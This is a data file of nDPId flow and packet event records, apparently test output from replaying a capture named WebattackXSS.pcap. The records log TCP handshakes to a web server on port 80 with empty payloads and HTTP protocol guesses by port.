+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1499347268659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347268659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TBAAD4G6KesEAABwKgKMtheAFDSkdD4N5ZLKYAQAOUNsAAAAQEICgE6DdgD499O"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347271162,"flow_last_seen":1499347271162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347271162,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1499347271162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347271162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86ilAAD4G26asEAABwKgKMth4AFDbDvpjAAAAAKACchCfRAAAAgQFtAQCCAoBOhBKAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2530,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1499347271163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347271163,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2HgbmHvT2w76ZKAScSAjFAAAAgQFtAQCCAoD4+HAAToQSgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1499347271163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347271163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06ipAAD4G262sEAABwKgKMth4AFDbDvpkG5h71IAQAOXCGwAAAQEICgE6EEoD4+HA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347272469,"flow_last_seen":1499347272469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1499347272469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347272469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wnhAAD4GA1isEAABwKgKMtiGAFBxpNPoAAAAAKACchAt1gAAAgQFtAQCCAoBOhGQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":2,"flow_last_seen":1499347272469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347272469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2IbhJKqDcaTT6aAScSC8IQAAAgQFtAQCCAoD4+MHAToRkAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":3,"flow_last_seen":1499347272470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347272470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wnlAAD4GA1+sEAABwKgKMtiGAFBxpNPp4SSqhIAQAOVbKAAAAQEICgE6EZED4+MH"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347146267,"flow_last_seen":1499347151654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347147523,"flow_last_seen":1499347152654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347272693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54108,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347273742,"flow_last_seen":1499347273742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347273742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1499347273742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347273742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8s+tAAD4GEeWsEAABwKgKMtiUAFBek6EkAAAAAKACchByXgAAAgQFtAQCCAoBOhLPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":2,"flow_last_seen":1499347273742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347273742,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2JQ5PiSKXpOhJaAScSAtTAAAAgQFtAQCCAoD4+RFAToSzwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":3,"flow_last_seen":1499347273743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347273743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0s+xAAD4GEeysEAABwKgKMtiUAFBek6ElOT4ki4AQAOXMUwAAAQEICgE6Es8D4+RF"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347276278,"flow_last_seen":1499347276278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347276278,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2571,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1499347276278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347276278,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8RHhAAD4GgVisEAABwKgKMtiuAFAiVFExAAAAAKACchD7\/AAAAgQFtAQCCAoBOhVJAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2572,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":2,"flow_last_seen":1499347276278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347276278,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2K6190rBIlRRMqAScSARgAAAAgQFtAQCCAoD4+a\/AToVSQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2573,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":3,"flow_last_seen":1499347276279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347276279,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0RHlAAD4GgV+sEAABwKgKMtiuAFAiVFEytfdKwoAQAOWwhwAAAQEICgE6FUkD4+a\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347277521,"flow_last_seen":1499347277521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347277521,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1499347277521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347277521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMti8AFAjjgSGAAAAAKACchBGKgAAAgQFtAQCCAoBOhZ\/AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":2,"flow_last_seen":1499347277521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347277521,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2LxShGbpI44Eh6AScSChwgAAAgQFtAQCCAoD4+f1AToWfwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":3,"flow_last_seen":1499347277521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347277521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EvpAAD4Gst6sEAABwKgKMti8AFAjjgSHUoRm6oAQAOVAygAAAQEICgE6Fn8D4+f1"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347280049,"flow_last_seen":1499347280049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347280049,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1499347280049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347280049,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qXBAAD4GHGCsEAABwKgKMtjWAFBVFLGHAAAAAKACchBlEAAAAgQFtAQCCAoBOhj3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1499347280049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347280049,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2NbA11G6VRSxiKAScSBlDAAAAgQFtAQCCAoD4+ptAToY9wEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2606,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1499347280050,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347280050,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qXFAAD4GHGesEAABwKgKMtjWAFBVFLGIwNdRu4AQAOUEEwAAAQEICgE6GPgD4+pt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347281325,"flow_last_seen":1499347281325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347281325,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1499347281325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347281325,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8klhAAD4GM3isEAABwKgKMtjkAFB+h4huAAAAAKACchBjaQAAAgQFtAQCCAoBOho2AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2614,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":2,"flow_last_seen":1499347281325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347281325,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ORl6oVWfoeIb6AScSCJdwAAAgQFtAQCCAoD4+usAToaNgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2615,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":3,"flow_last_seen":1499347281326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347281326,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kllAAD4GM3+sEAABwKgKMtjkAFB+h4hvZeqFV4AQAOUofwAAAQEICgE6GjYD4+us"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347282573,"flow_last_seen":1499347282573,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282573,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2625,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1499347282573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347282573,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mj1AAD4GK5OsEAABwKgKMtjyAFDR4YFTAAAAAKACchAV5AAAAgQFtAQCCAoBOhtuAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1499347282574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347282574,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2PL\/kZOB0eGBVKAScSCS5gAAAgQFtAQCCAoD4+zlATobbgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2627,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1499347282574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347282574,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mj5AAD4GK5qsEAABwKgKMtjyAFDR4YFU\/5GTgoAQAOUx7QAAAQEICgE6G28D4+zl"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347150236,"flow_last_seen":1499347155656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 